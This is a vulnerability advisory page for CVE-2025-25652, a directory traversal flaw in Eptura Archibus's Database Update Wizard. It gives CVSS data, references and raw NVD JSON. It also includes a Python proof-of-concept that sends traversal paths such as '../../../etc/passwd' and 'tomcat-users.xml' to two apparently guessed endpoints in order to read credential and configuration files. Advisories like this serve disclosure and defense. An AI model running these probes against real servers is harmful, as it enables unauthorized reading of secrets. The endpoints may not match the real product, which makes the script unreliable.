Security Vulnerability Report
CVE-2025-25652 CVSS 7.5 HIGH

Published: 2026-01-13 17:15:57
Last Modified: 2026-02-13 21:03:17

Description

In Eptura Archibus 2024.03.01.109, the "Run script" and "Server File" components of the "Database Update Wizard" are vulnerable to directory traversal.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:eptura:archibus:2024.03.01.109:*:*:*:*:*:*:* - VULNERABLE
Eptura Archibus 2024.03.01.109

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-25652 PoC - Eptura Archibus Directory Traversal
Note: This PoC is for educational and authorized testing purposes only.
"""
import requests

TARGET_URL = "http://target-server.com/archibus/"


def test_directory_traversal():
    """Test for directory traversal vulnerability in Database Update Wizard"""
    # Common sensitive files to test (Windows path kept as a raw string so the
    # backslashes are sent literally instead of being parsed as escapes)
    test_paths = [
        "../../../etc/passwd",
        r"..\..\..\windows\system32\drivers\etc\hosts",
        "../../../web.xml",
        "../../../tomcat-users.xml",
        "../../../database.properties",
    ]

    # Test Run Script component
    run_script_url = TARGET_URL + "dbupdate/runScript"
    # Test Server File component
    server_file_url = TARGET_URL + "dbupdate/serverFile"

    print("[*] Testing CVE-2025-25652 Directory Traversal...")
    print(f"[*] Target: {TARGET_URL}")

    for path in test_paths:
        # Test Run Script endpoint
        params = {"scriptPath": path}
        try:
            response = requests.get(run_script_url, params=params, timeout=10)
            if response.status_code == 200 and len(response.content) > 0:
                print(f"[!] Potential vulnerability found at Run Script with path: {path}")
                print(f"    Response length: {len(response.content)} bytes")
        except requests.RequestException as e:
            print(f"[-] Request failed for Run Script: {e}")

        # Test Server File endpoint
        params = {"filePath": path}
        try:
            response = requests.get(server_file_url, params=params, timeout=10)
            if response.status_code == 200 and len(response.content) > 0:
                print(f"[!] Potential vulnerability found at Server File with path: {path}")
                print(f"    Response length: {len(response.content)} bytes")
        except requests.RequestException as e:
            print(f"[-] Request failed for Server File: {e}")


if __name__ == "__main__":
    test_directory_traversal()

References

https://eptura.com/our-platform/archibus/ (Product)
https://packetstorm.news/files/id/213675 (Exploit, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-25652", "sourceIdentifier": "[email protected]", "published": "2026-01-13T17:15:57.070", "lastModified": "2026-02-13T21:03:16.547", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Eptura Archibus 2024.03.01.109, the \"Run script\" and \"Server File\" components of the \"Database Update Wizard\" are vulnerable to directory traversal."}, {"lang": "es", "value": "En Eptura Archibus 2024.03.01.109, los componentes 'Run script' y 'Server File' del 'Asistente de actualización de base de datos' son vulnerables a salto de directorio."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:eptura:archibus:2024.03.01.109:*:*:*:*:*:*:*", "matchCriteriaId": "22B635E8-316B-4F53-ACDE-9E56785CFE1F"}]}]}], "references": [{"url": "https://eptura.com/our-platform/archibus/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://packetstorm.news/files/id/213675", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}